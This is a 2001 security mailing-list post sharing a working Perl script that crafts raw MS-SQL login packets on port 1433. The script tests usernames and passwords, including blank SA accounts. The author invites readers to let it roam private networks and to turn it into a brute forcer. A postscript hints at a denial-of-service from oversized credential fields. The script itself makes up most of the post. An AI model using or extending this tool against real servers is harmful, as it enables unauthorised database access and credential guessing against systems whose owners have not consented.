PERL based MS-SQL username/password checker

-------- Original Message --------
Subject: PERL based MS-SQL username/password checker
Date: Fri, 9 Nov 2001 01:37:18 +0000 (GMT)
From: RT <roelof@sensepost.com>
To: <pen-test@securityfocus.com>, <vuln-dev@securityfocus.com>
CC: <alan@packetstormsecurity.org>, <gov-boi@hack.co.za>

Ppl,

Always wanted a PERL based script that could test for usernames and passwords
on MS-SQL (1433)? Test for blank SA passwords etc..? Let it roam inside a
private net? Open source..modify and have fun...turn it into a brute forcer -
whatever...

Enjoy.
Roelof.

PS: found a way to DOS the service as well. Mail was sent to M$. Let's see what
they come up with. Fiddle with the space allocated to the username and
password... Eeye might even come up with a sweet buffer overflow..who knows??

------------------------------------------------------
Roelof W Temmingh               SensePost IT security
roelof@sensepost.com            +27 83 448 6996
http://www.sensepost.com        http://www.hackrack.com

#!/usr/bin/perl
##
## SQL username/password checker
## Parameters: senseql <IP> <username> <password>
##
## Eg. to check for blank SA:
## senseql 10.0.0.1 sa ""
##
## Roelof Temmingh / Haroon Meer
## roelof@sensepost.com / haroon@senspost.com
## SensePost IT Security
## http://www.sensepost.com
## http://www.hackrack.com
## 2001/11/09
##
## Only tested with version 7.0
##
## You need 1433 open...duh!
##

use IO::Socket;
$|=1;

if ($#ARGV<2) {die "Usage: senseql IP username password\n";}
$port=1433; $host=$ARGV[0]; $username=$ARGV[1]; $pass=$ARGV[2];
$unh=pack("a30",$username);$psh=pack("a30",$pass);
$numu=pack("c",length($username)); $nump=pack("c",length($pass));
$FRONT="020002000000020000000000000000000000000000000000000000000000000000000000000000";
$REST="30303030303061300000000000000000000000000000000000201881b82c080301060a090101000000000000000000737175656c646120312e30000000000000000000000000000000000000000b0000000000000000000000000000000000000000000000000000000000000000";
$REST2="0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040200004d5344424c49420000000706000000000d11000000000000000000000000000000000000000000000000";
$hfront=pack("H*",$FRONT);$hrest=pack("H*",$REST);$hrest2=pack("H*",$REST2);
$FULL=$hfront.$unh.$numu.$psh.$nump.$hrest.$nump.$psh.$hrest2;
$SENDY2="0201004700000200000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030303000000003000000";
$SENDY2 = pack("H*",$SENDY2);
print "$host:$username:$pass:";
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort => $port)
|| die "No SQL here man...";
print $remote $FULL; print $remote $SENDY2;
recv($remote,$back,100,MSG_PEEK);
if ($back =~ /context to 'master'/) {print "Yep - go for it\n"}
else {print "No dude..\n";}
close ($remote);